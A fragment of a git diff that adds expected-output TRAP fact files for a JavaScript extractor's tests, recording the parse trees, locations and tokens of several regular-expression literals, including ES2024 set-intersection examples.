+#20016=@"loc,{#10000},1,1,3,0" +locations_default(#20016,#10000,1,1,3,0) +hasLocation(#20001,#20016) +#20017=* +stmts(#20017,2,#20001,0,"/^p(ost ... ]]*/g;") +hasLocation(#20017,#20003) +stmt_containers(#20017,#20001) +#20018=* +exprs(#20018,5,#20017,0,"/^p(ost ... z ]]*/g") +hasLocation(#20018,#20007) +enclosing_stmt(#20018,#20017) +expr_containers(#20018,#20001) +literals("/^p(ost)?[ |\.]*o(ffice)?[ |\.]*(box)?[ 0-9]*[^[a-z ]]*/g","/^p(ost)?[ |\.]*o(ffice)?[ |\.]*(box)?[ 0-9]*[^[a-z ]]*/g",#20018) +#20019=* +regexpterm(#20019,1,#20018,0,"^p(ost)?[ |\.]*o(ffice)?[ |\.]*(box)?[ 0-9]*[^[a-z ]]*") +#20020=@"loc,{#10000},1,2,1,55" +locations_default(#20020,#10000,1,2,1,55) +hasLocation(#20019,#20020) +#20021=* +regexpterm(#20021,2,#20019,0,"^") +#20022=@"loc,{#10000},1,2,1,2" +locations_default(#20022,#10000,1,2,1,2) +hasLocation(#20021,#20022) +#20023=* +regexpterm(#20023,14,#20019,1,"p") +#20024=@"loc,{#10000},1,3,1,3" +locations_default(#20024,#10000,1,3,1,3) +hasLocation(#20023,#20024) +regexp_const_value(#20023,"p") +#20025=* +regexpterm(#20025,10,#20019,2,"(ost)?") +#20026=@"loc,{#10000},1,4,1,9" +locations_default(#20026,#10000,1,4,1,9) +hasLocation(#20025,#20026) +is_greedy(#20025) +#20027=* +regexpterm(#20027,13,#20025,0,"(ost)") +#20028=@"loc,{#10000},1,4,1,8" +locations_default(#20028,#10000,1,4,1,8) +hasLocation(#20027,#20028) +is_capture(#20027,1) +#20029=* +regexpterm(#20029,14,#20027,0,"ost") +#20030=@"loc,{#10000},1,5,1,7" +locations_default(#20030,#10000,1,5,1,7) +hasLocation(#20029,#20030) +regexp_const_value(#20029,"ost") +#20031=* +regexpterm(#20031,8,#20019,3,"[ |\.]*") +#20032=@"loc,{#10000},1,10,1,16" +locations_default(#20032,#10000,1,10,1,16) +hasLocation(#20031,#20032) +is_greedy(#20031) +#20033=* +regexpterm(#20033,23,#20031,0,"[ |\.]") +#20034=@"loc,{#10000},1,10,1,15" +locations_default(#20034,#10000,1,10,1,15) +hasLocation(#20033,#20034) +#20035=* +regexpterm(#20035,14,#20033,0," ") +#20036=@"loc,{#10000},1,11,1,11" +locations_default(#20036,#10000,1,11,1,11) +hasLocation(#20035,#20036) +regexp_const_value(#20035," ") +#20037=* +regexpterm(#20037,14,#20033,1,"|") +#20038=@"loc,{#10000},1,12,1,12" +locations_default(#20038,#10000,1,12,1,12) +hasLocation(#20037,#20038) +regexp_const_value(#20037,"|") +#20039=* +regexpterm(#20039,21,#20033,2,"\.") +#20040=@"loc,{#10000},1,13,1,14" +locations_default(#20040,#10000,1,13,1,14) +hasLocation(#20039,#20040) +regexp_const_value(#20039,".") +#20041=* +regexpterm(#20041,14,#20019,4,"o") +#20042=@"loc,{#10000},1,17,1,17" +locations_default(#20042,#10000,1,17,1,17) +hasLocation(#20041,#20042) +regexp_const_value(#20041,"o") +#20043=* +regexpterm(#20043,10,#20019,5,"(ffice)?") +#20044=@"loc,{#10000},1,18,1,25" +locations_default(#20044,#10000,1,18,1,25) +hasLocation(#20043,#20044) +is_greedy(#20043) +#20045=* +regexpterm(#20045,13,#20043,0,"(ffice)") +#20046=@"loc,{#10000},1,18,1,24" +locations_default(#20046,#10000,1,18,1,24) +hasLocation(#20045,#20046) +is_capture(#20045,2) +#20047=* +regexpterm(#20047,14,#20045,0,"ffice") +#20048=@"loc,{#10000},1,19,1,23" +locations_default(#20048,#10000,1,19,1,23) +hasLocation(#20047,#20048) +regexp_const_value(#20047,"ffice") +#20049=* +regexpterm(#20049,8,#20019,6,"[ |\.]*") +#20050=@"loc,{#10000},1,26,1,32" +locations_default(#20050,#10000,1,26,1,32) +hasLocation(#20049,#20050) +is_greedy(#20049) +#20051=* +regexpterm(#20051,23,#20049,0,"[ |\.]") +#20052=@"loc,{#10000},1,26,1,31" +locations_default(#20052,#10000,1,26,1,31) +hasLocation(#20051,#20052) +#20053=* +regexpterm(#20053,14,#20051,0," ") +#20054=@"loc,{#10000},1,27,1,27" +locations_default(#20054,#10000,1,27,1,27) +hasLocation(#20053,#20054) +regexp_const_value(#20053," ") +#20055=* +regexpterm(#20055,14,#20051,1,"|") +#20056=@"loc,{#10000},1,28,1,28" +locations_default(#20056,#10000,1,28,1,28) +hasLocation(#20055,#20056) +regexp_const_value(#20055,"|") +#20057=* +regexpterm(#20057,21,#20051,2,"\.") +#20058=@"loc,{#10000},1,29,1,30" +locations_default(#20058,#10000,1,29,1,30) +hasLocation(#20057,#20058) +regexp_const_value(#20057,".") +#20059=* +regexpterm(#20059,10,#20019,7,"(box)?") +#20060=@"loc,{#10000},1,33,1,38" +locations_default(#20060,#10000,1,33,1,38) +hasLocation(#20059,#20060) +is_greedy(#20059) +#20061=* +regexpterm(#20061,13,#20059,0,"(box)") +#20062=@"loc,{#10000},1,33,1,37" +locations_default(#20062,#10000,1,33,1,37) +hasLocation(#20061,#20062) +is_capture(#20061,3) +#20063=* +regexpterm(#20063,14,#20061,0,"box") +#20064=@"loc,{#10000},1,34,1,36" +locations_default(#20064,#10000,1,34,1,36) +hasLocation(#20063,#20064) +regexp_const_value(#20063,"box") +#20065=* +regexpterm(#20065,8,#20019,8,"[ 0-9]*") +#20066=@"loc,{#10000},1,39,1,45" +locations_default(#20066,#10000,1,39,1,45) +hasLocation(#20065,#20066) +is_greedy(#20065) +#20067=* +regexpterm(#20067,23,#20065,0,"[ 0-9]") +#20068=@"loc,{#10000},1,39,1,44" +locations_default(#20068,#10000,1,39,1,44) +hasLocation(#20067,#20068) +#20069=* +regexpterm(#20069,14,#20067,0," ") +#20070=@"loc,{#10000},1,40,1,40" +locations_default(#20070,#10000,1,40,1,40) +hasLocation(#20069,#20070) +regexp_const_value(#20069," ") +#20071=* +regexpterm(#20071,24,#20067,1,"0-9") +#20072=@"loc,{#10000},1,41,1,43" +locations_default(#20072,#10000,1,41,1,43) +hasLocation(#20071,#20072) +#20073=* +regexpterm(#20073,14,#20071,0,"0") +#20074=@"loc,{#10000},1,41,1,41" +locations_default(#20074,#10000,1,41,1,41) +hasLocation(#20073,#20074) +regexp_const_value(#20073,"0") +#20075=* +regexpterm(#20075,14,#20071,1,"9") +#20076=@"loc,{#10000},1,43,1,43" +locations_default(#20076,#10000,1,43,1,43) +hasLocation(#20075,#20076) +regexp_const_value(#20075,"9") +#20077=* +regexpterm(#20077,23,#20019,9,"[^[a-z ]") +#20078=@"loc,{#10000},1,46,1,53" +locations_default(#20078,#10000,1,46,1,53) +hasLocation(#20077,#20078) +is_inverted(#20077) +#20079=* +regexpterm(#20079,14,#20077,0,"[") +#20080=@"loc,{#10000},1,48,1,48" +locations_default(#20080,#10000,1,48,1,48) +hasLocation(#20079,#20080) +regexp_const_value(#20079,"[") +#20081=* +regexpterm(#20081,24,#20077,1,"a-z") +#20082=@"loc,{#10000},1,49,1,51" +locations_default(#20082,#10000,1,49,1,51) +hasLocation(#20081,#20082) +#20083=* +regexpterm(#20083,14,#20081,0,"a") +#20084=@"loc,{#10000},1,49,1,49" +locations_default(#20084,#10000,1,49,1,49) +hasLocation(#20083,#20084) +regexp_const_value(#20083,"a") +#20085=* +regexpterm(#20085,14,#20081,1,"z") +#20086=@"loc,{#10000},1,51,1,51" +locations_default(#20086,#10000,1,51,1,51) +hasLocation(#20085,#20086) +regexp_const_value(#20085,"z") +#20087=* +regexpterm(#20087,14,#20077,2," ") +#20088=@"loc,{#10000},1,52,1,52" +locations_default(#20088,#10000,1,52,1,52) +hasLocation(#20087,#20088) +regexp_const_value(#20087," ") +#20089=* +regexpterm(#20089,8,#20019,10,"]*") +#20090=@"loc,{#10000},1,54,1,55" +locations_default(#20090,#10000,1,54,1,55) +hasLocation(#20089,#20090) +is_greedy(#20089) +#20091=* +regexpterm(#20091,14,#20089,0,"]") +#20092=@"loc,{#10000},1,54,1,54" +locations_default(#20092,#10000,1,54,1,54) +hasLocation(#20091,#20092) +regexp_const_value(#20091,"]") +#20093=* +regexp_parse_errors(#20093,#20019,"unexpected character") +hasLocation(#20093,#20092) +#20094=* +stmts(#20094,2,#20001,1,"/([ ]*[ ... ]+)+X/;") +hasLocation(#20094,#20005) +stmt_containers(#20094,#20001) +#20095=* +exprs(#20095,5,#20094,0,"/([ ]*[ ... -]+)+X/") +hasLocation(#20095,#20011) +enclosing_stmt(#20095,#20094) +expr_containers(#20095,#20001) +literals("/([ ]*[a-z0-9&#*=?@\\><:,()$[\]_.{}!+%^-]+)+X/","/([ ]*[a-z0-9&#*=?@\\><:,()$[\]_.{}!+%^-]+)+X/",#20095) +#20096=* +regexpterm(#20096,1,#20095,0,"([ ]*[a-z0-9&#*=?@\\><:,()$[\]_.{}!+%^-]+)+X") +#20097=@"loc,{#10000},2,2,2,45" +locations_default(#20097,#10000,2,2,2,45) +hasLocation(#20096,#20097) +#20098=* +regexpterm(#20098,9,#20096,0,"([ ]*[a-z0-9&#*=?@\\><:,()$[\]_.{}!+%^-]+)+") +#20099=@"loc,{#10000},2,2,2,44" +locations_default(#20099,#10000,2,2,2,44) +hasLocation(#20098,#20099) +is_greedy(#20098) +#20100=* +regexpterm(#20100,13,#20098,0,"([ ]*[a-z0-9&#*=?@\\><:,()$[\]_.{}!+%^-]+)") +#20101=@"loc,{#10000},2,2,2,43" +locations_default(#20101,#10000,2,2,2,43) +hasLocation(#20100,#20101) +is_capture(#20100,1) +#20102=* +regexpterm(#20102,1,#20100,0,"[ ]*[a-z0-9&#*=?@\\><:,()$[\]_.{}!+%^-]+") +#20103=@"loc,{#10000},2,3,2,42" +locations_default(#20103,#10000,2,3,2,42) +hasLocation(#20102,#20103) +#20104=* +regexpterm(#20104,8,#20102,0,"[ ]*") +#20105=@"loc,{#10000},2,3,2,6" +locations_default(#20105,#10000,2,3,2,6) +hasLocation(#20104,#20105) +is_greedy(#20104) +#20106=* +regexpterm(#20106,23,#20104,0,"[ ]") +#20107=@"loc,{#10000},2,3,2,5" +locations_default(#20107,#10000,2,3,2,5) +hasLocation(#20106,#20107) +#20108=* +regexpterm(#20108,14,#20106,0," ") +#20109=@"loc,{#10000},2,4,2,4" +locations_default(#20109,#10000,2,4,2,4) +hasLocation(#20108,#20109) +regexp_const_value(#20108," ") +#20110=* +regexpterm(#20110,9,#20102,1,"[a-z0-9&#*=?@\\><:,()$[\]_.{}!+%^-]+") +#20111=@"loc,{#10000},2,7,2,42" +locations_default(#20111,#10000,2,7,2,42) +hasLocation(#20110,#20111) +is_greedy(#20110) +#20112=* +regexpterm(#20112,23,#20110,0,"[a-z0-9&#*=?@\\><:,()$[\]_.{}!+%^-]") +#20113=@"loc,{#10000},2,7,2,41" +locations_default(#20113,#10000,2,7,2,41) +hasLocation(#20112,#20113) +#20114=* +regexpterm(#20114,24,#20112,0,"a-z") +#20115=@"loc,{#10000},2,8,2,10" +locations_default(#20115,#10000,2,8,2,10) +hasLocation(#20114,#20115) +#20116=* +regexpterm(#20116,14,#20114,0,"a") +#20117=@"loc,{#10000},2,8,2,8" +locations_default(#20117,#10000,2,8,2,8) +hasLocation(#20116,#20117) +regexp_const_value(#20116,"a") +#20118=* +regexpterm(#20118,14,#20114,1,"z") +#20119=@"loc,{#10000},2,10,2,10" +locations_default(#20119,#10000,2,10,2,10) +hasLocation(#20118,#20119) +regexp_const_value(#20118,"z") +#20120=* +regexpterm(#20120,24,#20112,1,"0-9") +#20121=@"loc,{#10000},2,11,2,13" +locations_default(#20121,#10000,2,11,2,13) +hasLocation(#20120,#20121) +#20122=* +regexpterm(#20122,14,#20120,0,"0") +#20123=@"loc,{#10000},2,11,2,11" +locations_default(#20123,#10000,2,11,2,11) +hasLocation(#20122,#20123) +regexp_const_value(#20122,"0") +#20124=* +regexpterm(#20124,14,#20120,1,"9") +#20125=@"loc,{#10000},2,13,2,13" +locations_default(#20125,#10000,2,13,2,13) +hasLocation(#20124,#20125) +regexp_const_value(#20124,"9") +#20126=* +regexpterm(#20126,14,#20112,2,"&") +#20127=@"loc,{#10000},2,14,2,14" +locations_default(#20127,#10000,2,14,2,14) +hasLocation(#20126,#20127) +regexp_const_value(#20126,"&") +#20128=* +regexpterm(#20128,14,#20112,3,"#") +#20129=@"loc,{#10000},2,15,2,15" +locations_default(#20129,#10000,2,15,2,15) +hasLocation(#20128,#20129) +regexp_const_value(#20128,"#") +#20130=* +regexpterm(#20130,14,#20112,4,"*") +#20131=@"loc,{#10000},2,16,2,16" +locations_default(#20131,#10000,2,16,2,16) +hasLocation(#20130,#20131) +regexp_const_value(#20130,"*") +#20132=* +regexpterm(#20132,14,#20112,5,"=") +#20133=@"loc,{#10000},2,17,2,17" +locations_default(#20133,#10000,2,17,2,17) +hasLocation(#20132,#20133) +regexp_const_value(#20132,"=") +#20134=* +regexpterm(#20134,14,#20112,6,"?") +#20135=@"loc,{#10000},2,18,2,18" +locations_default(#20135,#10000,2,18,2,18) +hasLocation(#20134,#20135) +regexp_const_value(#20134,"?") +#20136=* +regexpterm(#20136,14,#20112,7,"@") +#20137=@"loc,{#10000},2,19,2,19" +locations_default(#20137,#10000,2,19,2,19) +hasLocation(#20136,#20137) +regexp_const_value(#20136,"@") +#20138=* +regexpterm(#20138,21,#20112,8,"\\") +#20139=@"loc,{#10000},2,20,2,21" +locations_default(#20139,#10000,2,20,2,21) +hasLocation(#20138,#20139) +regexp_const_value(#20138,"\") +#20140=* +regexpterm(#20140,14,#20112,9,">") +#20141=@"loc,{#10000},2,22,2,22" +locations_default(#20141,#10000,2,22,2,22) +hasLocation(#20140,#20141) +regexp_const_value(#20140,">") +#20142=* +regexpterm(#20142,14,#20112,10,"<") +#20143=@"loc,{#10000},2,23,2,23" +locations_default(#20143,#10000,2,23,2,23) +hasLocation(#20142,#20143) +regexp_const_value(#20142,"<") +#20144=* +regexpterm(#20144,14,#20112,11,":") +#20145=@"loc,{#10000},2,24,2,24" +locations_default(#20145,#10000,2,24,2,24) +hasLocation(#20144,#20145) +regexp_const_value(#20144,":") +#20146=* +regexpterm(#20146,14,#20112,12,",") +#20147=@"loc,{#10000},2,25,2,25" +locations_default(#20147,#10000,2,25,2,25) +hasLocation(#20146,#20147) +regexp_const_value(#20146,",") +#20148=* +regexpterm(#20148,14,#20112,13,"(") +#20149=@"loc,{#10000},2,26,2,26" +locations_default(#20149,#10000,2,26,2,26) +hasLocation(#20148,#20149) +regexp_const_value(#20148,"(") +#20150=* +regexpterm(#20150,14,#20112,14,")") +#20151=@"loc,{#10000},2,27,2,27" +locations_default(#20151,#10000,2,27,2,27) +hasLocation(#20150,#20151) +regexp_const_value(#20150,")") +#20152=* +regexpterm(#20152,14,#20112,15,"$") +#20153=@"loc,{#10000},2,28,2,28" +locations_default(#20153,#10000,2,28,2,28) +hasLocation(#20152,#20153) +regexp_const_value(#20152,"$") +#20154=* +regexpterm(#20154,14,#20112,16,"[") +#20155=@"loc,{#10000},2,29,2,29" +locations_default(#20155,#10000,2,29,2,29) +hasLocation(#20154,#20155) +regexp_const_value(#20154,"[") +#20156=* +regexpterm(#20156,21,#20112,17,"\]") +#20157=@"loc,{#10000},2,30,2,31" +locations_default(#20157,#10000,2,30,2,31) +hasLocation(#20156,#20157) +regexp_const_value(#20156,"]") +#20158=* +regexpterm(#20158,14,#20112,18,"_") +#20159=@"loc,{#10000},2,32,2,32" +locations_default(#20159,#10000,2,32,2,32) +hasLocation(#20158,#20159) +regexp_const_value(#20158,"_") +#20160=* +regexpterm(#20160,14,#20112,19,".") +#20161=@"loc,{#10000},2,33,2,33" +locations_default(#20161,#10000,2,33,2,33) +hasLocation(#20160,#20161) +regexp_const_value(#20160,".") +#20162=* +regexpterm(#20162,14,#20112,20,"{") +#20163=@"loc,{#10000},2,34,2,34" +locations_default(#20163,#10000,2,34,2,34) +hasLocation(#20162,#20163) +regexp_const_value(#20162,"{") +#20164=* +regexpterm(#20164,14,#20112,21,"}") +#20165=@"loc,{#10000},2,35,2,35" +locations_default(#20165,#10000,2,35,2,35) +hasLocation(#20164,#20165) +regexp_const_value(#20164,"}") +#20166=* +regexpterm(#20166,14,#20112,22,"!") +#20167=@"loc,{#10000},2,36,2,36" +locations_default(#20167,#10000,2,36,2,36) +hasLocation(#20166,#20167) +regexp_const_value(#20166,"!") +#20168=* +regexpterm(#20168,14,#20112,23,"+") +#20169=@"loc,{#10000},2,37,2,37" +locations_default(#20169,#10000,2,37,2,37) +hasLocation(#20168,#20169) +regexp_const_value(#20168,"+") +#20170=* +regexpterm(#20170,14,#20112,24,"%") +#20171=@"loc,{#10000},2,38,2,38" +locations_default(#20171,#10000,2,38,2,38) +hasLocation(#20170,#20171) +regexp_const_value(#20170,"%") +#20172=* +regexpterm(#20172,14,#20112,25,"^") +#20173=@"loc,{#10000},2,39,2,39" +locations_default(#20173,#10000,2,39,2,39) +hasLocation(#20172,#20173) +regexp_const_value(#20172,"^") +#20174=* +regexpterm(#20174,14,#20112,26,"-") +#20175=@"loc,{#10000},2,40,2,40" +locations_default(#20175,#10000,2,40,2,40) +hasLocation(#20174,#20175) +regexp_const_value(#20174,"-") +#20176=* +regexpterm(#20176,14,#20096,1,"X") +#20177=@"loc,{#10000},2,45,2,45" +locations_default(#20177,#10000,2,45,2,45) +hasLocation(#20176,#20177) +regexp_const_value(#20176,"X") +#20178=* +entry_cfg_node(#20178,#20001) +#20179=@"loc,{#10000},1,1,1,0" +locations_default(#20179,#10000,1,1,1,0) +hasLocation(#20178,#20179) +#20180=* +exit_cfg_node(#20180,#20001) +hasLocation(#20180,#20015) +successor(#20094,#20095) +successor(#20095,#20180) +successor(#20017,#20018) +successor(#20018,#20094) +successor(#20178,#20017) +numlines(#10000,2,2,0) +filetype(#10000,"javascript") diff --git a/javascript/extractor/tests/es2024/output/trap/intersection.js.trap b/javascript/extractor/tests/es2024/output/trap/intersection.js.trap new file mode 100644 index 000000000000..a48eccb5a741 --- /dev/null +++ b/javascript/extractor/tests/es2024/output/trap/intersection.js.trap @@ -0,0 +1,397 @@ +#10000=@"/intersection.js;sourcefile" +files(#10000,"/intersection.js") +#10001=@"/;folder" +folders(#10001,"/") +containerparent(#10001,#10000) +#10002=@"loc,{#10000},0,0,0,0" +locations_default(#10002,#10000,0,0,0,0) +hasLocation(#10000,#10002) +#20000=@"global_scope" +scopes(#20000,0) +#20001=@"script;{#10000},1,1" +#20002=* +comments(#20002,0,#20001," Valid use of intersection operator, matches b or c","// Vali ... b or c") +#20003=@"loc,{#10000},1,20,1,72" +locations_default(#20003,#10000,1,20,1,72) +hasLocation(#20002,#20003) +#20004=* +comments(#20004,0,#20001,"Valid regex, but no intersection operation: Matches the literal string ""abc&&bcd""","//Valid ... c&&bcd""") +#20005=@"loc,{#10000},2,14,2,96" +locations_default(#20005,#10000,2,14,2,96) +hasLocation(#20004,#20005) +#20006=* +comments(#20006,0,#20001," Valid regex, but incorrect intersection operation: ","// Vali ... ation: ") +#20007=@"loc,{#10000},3,18,3,71" +locations_default(#20007,#10000,3,18,3,71) +hasLocation(#20006,#20007) +#20008=* +comments(#20008,0,#20001," - Matches a single character from [abc]","// - Ma ... m [abc]") +#20009=@"loc,{#10000},4,18,4,59" +locations_default(#20009,#10000,4,18,4,59) +hasLocation(#20008,#20009) +#20010=* +comments(#20010,0,#20001," - Then the literal ""&&""","// - Th ... al ""&&""") +#20011=@"loc,{#10000},5,18,5,43" +locations_default(#20011,#10000,5,18,5,43) +hasLocation(#20010,#20011) +#20012=* +comments(#20012,0,#20001," - Then a single character from [bcd]","// - Th ... m [bcd]") +#20013=@"loc,{#10000},6,18,6,56" +locations_default(#20013,#10000,6,18,6,56) +hasLocation(#20012,#20013) +#20014=* +comments(#20014,0,#20001," Valid use of intersection operator, matches c","// Vali ... tches c") +#20015=@"loc,{#10000},7,25,7,72" +locations_default(#20015,#10000,7,25,7,72) +hasLocation(#20014,#20015) +#20016=* +lines(#20016,#20001,"/[[abc]&&[bcd]]/v; // Valid use of intersection operator, matches b or c"," +") +#20017=@"loc,{#10000},1,1,1,72" +locations_default(#20017,#10000,1,1,1,72) +hasLocation(#20016,#20017) +#20018=* +lines(#20018,#20001,"/abc&&bcd/v; //Valid regex, but no intersection operation: Matches the literal string ""abc&&bcd"""," +") +#20019=@"loc,{#10000},2,1,2,96" +locations_default(#20019,#10000,2,1,2,96) +hasLocation(#20018,#20019) +#20020=* +lines(#20020,#20001,"/[abc]&&[bcd]/v; // Valid regex, but incorrect intersection operation: "," +") +#20021=@"loc,{#10000},3,1,3,71" +locations_default(#20021,#10000,3,1,3,71) +hasLocation(#20020,#20021) +#20022=* +lines(#20022,#20001," // - Matches a single character from [abc]"," +") +#20023=@"loc,{#10000},4,1,4,59" +locations_default(#20023,#10000,4,1,4,59) +hasLocation(#20022,#20023) +indentation(#10000,4," ",17) +#20024=* +lines(#20024,#20001," // - Then the literal ""&&"""," +") +#20025=@"loc,{#10000},5,1,5,43" +locations_default(#20025,#10000,5,1,5,43) +hasLocation(#20024,#20025) +indentation(#10000,5," ",17) +#20026=* +lines(#20026,#20001," // - Then a single character from [bcd]"," +") +#20027=@"loc,{#10000},6,1,6,56" +locations_default(#20027,#10000,6,1,6,56) +hasLocation(#20026,#20027) +indentation(#10000,6," ",17) +#20028=* +lines(#20028,#20001,"/[[abc]&&[bcd]&&[c]]/v; // Valid use of intersection operator, matches c"," +") +#20029=@"loc,{#10000},7,1,7,72" +locations_default(#20029,#10000,7,1,7,72) +hasLocation(#20028,#20029) +numlines(#20001,7,4,7) +#20030=* +tokeninfo(#20030,5,#20001,0,"/[[abc]&&[bcd]]/v") +#20031=@"loc,{#10000},1,1,1,17" +locations_default(#20031,#10000,1,1,1,17) +hasLocation(#20030,#20031) +#20032=* +tokeninfo(#20032,8,#20001,1,";") +#20033=@"loc,{#10000},1,18,1,18" +locations_default(#20033,#10000,1,18,1,18) +hasLocation(#20032,#20033) +#20034=* +tokeninfo(#20034,5,#20001,2,"/abc&&bcd/v") +#20035=@"loc,{#10000},2,1,2,11" +locations_default(#20035,#10000,2,1,2,11) +hasLocation(#20034,#20035) +next_token(#20002,#20034) +#20036=* +tokeninfo(#20036,8,#20001,3,";") +#20037=@"loc,{#10000},2,12,2,12" +locations_default(#20037,#10000,2,12,2,12) +hasLocation(#20036,#20037) +#20038=* +tokeninfo(#20038,5,#20001,4,"/[abc]&&[bcd]/v") +#20039=@"loc,{#10000},3,1,3,15" +locations_default(#20039,#10000,3,1,3,15) +hasLocation(#20038,#20039) +next_token(#20004,#20038) +#20040=* +tokeninfo(#20040,8,#20001,5,";") +#20041=@"loc,{#10000},3,16,3,16" +locations_default(#20041,#10000,3,16,3,16) +hasLocation(#20040,#20041) +#20042=* +tokeninfo(#20042,5,#20001,6,"/[[abc]&&[bcd]&&[c]]/v") +#20043=@"loc,{#10000},7,1,7,22" +locations_default(#20043,#10000,7,1,7,22) +hasLocation(#20042,#20043) +next_token(#20006,#20042) +next_token(#20008,#20042) +next_token(#20010,#20042) +next_token(#20012,#20042) +#20044=* +tokeninfo(#20044,8,#20001,7,";") +#20045=@"loc,{#10000},7,23,7,23" +locations_default(#20045,#10000,7,23,7,23) +hasLocation(#20044,#20045) +#20046=* +tokeninfo(#20046,0,#20001,8,"") +#20047=@"loc,{#10000},8,1,8,0" +locations_default(#20047,#10000,8,1,8,0) +hasLocation(#20046,#20047) +next_token(#20014,#20046) +toplevels(#20001,0) +#20048=@"loc,{#10000},1,1,8,0" +locations_default(#20048,#10000,1,1,8,0) +hasLocation(#20001,#20048) +#20049=* +stmts(#20049,2,#20001,0,"/[[abc]&&[bcd]]/v;") +#20050=@"loc,{#10000},1,1,1,18" +locations_default(#20050,#10000,1,1,1,18) +hasLocation(#20049,#20050) +stmt_containers(#20049,#20001) +#20051=* +exprs(#20051,5,#20049,0,"/[[abc]&&[bcd]]/v") +hasLocation(#20051,#20031) +enclosing_stmt(#20051,#20049) +expr_containers(#20051,#20001) +literals("/[[abc]&&[bcd]]/v","/[[abc]&&[bcd]]/v",#20051) +#20052=* +regexpterm(#20052,23,#20051,0,"[[abc]&&[bcd]]") +#20053=@"loc,{#10000},1,2,1,15" +locations_default(#20053,#10000,1,2,1,15) +hasLocation(#20052,#20053) +#20054=* +regexpterm(#20054,29,#20052,0,"[[abc]&&[bcd]]") +hasLocation(#20054,#20053) +#20055=* +regexpterm(#20055,23,#20054,0,"[abc]") +#20056=@"loc,{#10000},1,3,1,7" +locations_default(#20056,#10000,1,3,1,7) +hasLocation(#20055,#20056) +#20057=* +regexpterm(#20057,14,#20055,0,"a") +#20058=@"loc,{#10000},1,4,1,4" +locations_default(#20058,#10000,1,4,1,4) +hasLocation(#20057,#20058) +regexp_const_value(#20057,"a") +#20059=* +regexpterm(#20059,14,#20055,1,"b") +#20060=@"loc,{#10000},1,5,1,5" +locations_default(#20060,#10000,1,5,1,5) +hasLocation(#20059,#20060) +regexp_const_value(#20059,"b") +#20061=* +regexpterm(#20061,14,#20055,2,"c") +#20062=@"loc,{#10000},1,6,1,6" +locations_default(#20062,#10000,1,6,1,6) +hasLocation(#20061,#20062) +regexp_const_value(#20061,"c") +#20063=* +regexpterm(#20063,23,#20054,1,"[bcd]") +#20064=@"loc,{#10000},1,10,1,14" +locations_default(#20064,#10000,1,10,1,14) +hasLocation(#20063,#20064) +#20065=* +regexpterm(#20065,14,#20063,0,"b") +#20066=@"loc,{#10000},1,11,1,11" +locations_default(#20066,#10000,1,11,1,11) +hasLocation(#20065,#20066) +regexp_const_value(#20065,"b") +#20067=* +regexpterm(#20067,14,#20063,1,"c") +#20068=@"loc,{#10000},1,12,1,12" +locations_default(#20068,#10000,1,12,1,12) +hasLocation(#20067,#20068) +regexp_const_value(#20067,"c") +#20069=* +regexpterm(#20069,14,#20063,2,"d") +#20070=@"loc,{#10000},1,13,1,13" +locations_default(#20070,#10000,1,13,1,13) +hasLocation(#20069,#20070) +regexp_const_value(#20069,"d") +#20071=* +stmts(#20071,2,#20001,1,"/abc&&bcd/v;") +#20072=@"loc,{#10000},2,1,2,12" +locations_default(#20072,#10000,2,1,2,12) +hasLocation(#20071,#20072) +stmt_containers(#20071,#20001) +#20073=* +exprs(#20073,5,#20071,0,"/abc&&bcd/v") +hasLocation(#20073,#20035) +enclosing_stmt(#20073,#20071) +expr_containers(#20073,#20001) +literals("/abc&&bcd/v","/abc&&bcd/v",#20073) +#20074=* +regexpterm(#20074,14,#20073,0,"abc&&bcd") +#20075=@"loc,{#10000},2,2,2,9" +locations_default(#20075,#10000,2,2,2,9) +hasLocation(#20074,#20075) +regexp_const_value(#20074,"abc&&bcd") +#20076=* +stmts(#20076,2,#20001,2,"/[abc]&&[bcd]/v;") +#20077=@"loc,{#10000},3,1,3,16" +locations_default(#20077,#10000,3,1,3,16) +hasLocation(#20076,#20077) +stmt_containers(#20076,#20001) +#20078=* +exprs(#20078,5,#20076,0,"/[abc]&&[bcd]/v") +hasLocation(#20078,#20039) +enclosing_stmt(#20078,#20076) +expr_containers(#20078,#20001) +literals("/[abc]&&[bcd]/v","/[abc]&&[bcd]/v",#20078) +#20079=* +regexpterm(#20079,1,#20078,0,"[abc]&&[bcd]") +#20080=@"loc,{#10000},3,2,3,13" +locations_default(#20080,#10000,3,2,3,13) +hasLocation(#20079,#20080) +#20081=* +regexpterm(#20081,23,#20079,0,"[abc]") +#20082=@"loc,{#10000},3,2,3,6" +locations_default(#20082,#10000,3,2,3,6) +hasLocation(#20081,#20082) +#20083=* +regexpterm(#20083,14,#20081,0,"a") +#20084=@"loc,{#10000},3,3,3,3" +locations_default(#20084,#10000,3,3,3,3) +hasLocation(#20083,#20084) +regexp_const_value(#20083,"a") +#20085=* +regexpterm(#20085,14,#20081,1,"b") +#20086=@"loc,{#10000},3,4,3,4" +locations_default(#20086,#10000,3,4,3,4) +hasLocation(#20085,#20086) +regexp_const_value(#20085,"b") +#20087=* +regexpterm(#20087,14,#20081,2,"c") +#20088=@"loc,{#10000},3,5,3,5" +locations_default(#20088,#10000,3,5,3,5) +hasLocation(#20087,#20088) +regexp_const_value(#20087,"c") +#20089=* +regexpterm(#20089,14,#20079,1,"&&") +#20090=@"loc,{#10000},3,7,3,8" +locations_default(#20090,#10000,3,7,3,8) +hasLocation(#20089,#20090) +regexp_const_value(#20089,"&&") +#20091=* +regexpterm(#20091,23,#20079,2,"[bcd]") +#20092=@"loc,{#10000},3,9,3,13" +locations_default(#20092,#10000,3,9,3,13) +hasLocation(#20091,#20092) +#20093=* +regexpterm(#20093,14,#20091,0,"b") +#20094=@"loc,{#10000},3,10,3,10" +locations_default(#20094,#10000,3,10,3,10) +hasLocation(#20093,#20094) +regexp_const_value(#20093,"b") +#20095=* +regexpterm(#20095,14,#20091,1,"c") +#20096=@"loc,{#10000},3,11,3,11" +locations_default(#20096,#10000,3,11,3,11) +hasLocation(#20095,#20096) +regexp_const_value(#20095,"c") +#20097=* +regexpterm(#20097,14,#20091,2,"d") +#20098=@"loc,{#10000},3,12,3,12" +locations_default(#20098,#10000,3,12,3,12) +hasLocation(#20097,#20098) +regexp_const_value(#20097,"d") +#20099=* +stmts(#20099,2,#20001,3,"/[[abc] ... [c]]/v;") +#20100=@"loc,{#10000},7,1,7,23" +locations_default(#20100,#10000,7,1,7,23) +hasLocation(#20099,#20100) +stmt_containers(#20099,#20001) +#20101=* +exprs(#20101,5,#20099,0,"/[[abc] ... &[c]]/v") +hasLocation(#20101,#20043) +enclosing_stmt(#20101,#20099) +expr_containers(#20101,#20001) 